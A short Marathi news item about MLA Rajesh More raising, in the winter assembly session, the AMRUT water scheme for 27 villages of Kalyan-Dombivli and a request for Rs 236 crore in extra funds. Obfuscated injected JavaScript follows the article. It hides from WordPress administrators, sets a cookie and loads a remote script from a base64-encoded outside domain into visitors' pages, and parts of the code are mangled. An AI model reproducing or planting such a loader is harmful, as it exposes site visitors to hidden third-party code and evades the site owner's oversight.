आमदार राजेश मोरे: विधानसभेच्या हिवाळी अधिवेशनात आमदार राजेश मोरे यांनी जनतेच्या महत्वपूर्ण प्रश्नाला जोरदार आवाज दिला.
आमदार राजेश मोरे: अमृत योजनांतर्गत ग्रामीण विकासाला गती देण्यासाठी २७ गावांच्या प्रश्नांना दिला ठाम आवाज.
विधानसभेच्या हिवाळी अधिवेशनात आमदार राजेश मोरे यांनी जनतेच्या महत्वपूर्ण प्रश्नाला ठामपणे आणि जोरदार आवाज दिला.”

आमदार राजेश मोरे: अमृत माझ्या कल्याण-डोंबिवली महानगरपालिकेमार्फत सत्तावीस गावांमध्ये अमृत योजनेचे मोठ्या प्रमाणात काम सुरू असून सुमारे ऐंशी टक्के काम पूर्ण झाले आहे. उर्वरित कामांच्या पूर्ततेसाठी महापालिकेने शासनाकडे अतिरिक्त दोनशे छत्तीस कोटी रुपयांच्या निधीची मागणी केली आहे. आपल्या माध्यमातून मी शासनास नम्र विनंती करतो की हा वाढीव निधी मंजूर झाल्यास अमृत योजना पूर्णत्वास जाईल आणि सत्तावीस गावांतील नागरिकांचा पाण्याचा प्रश्न कायमस्वरूपी मार्गी लागेल.
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();


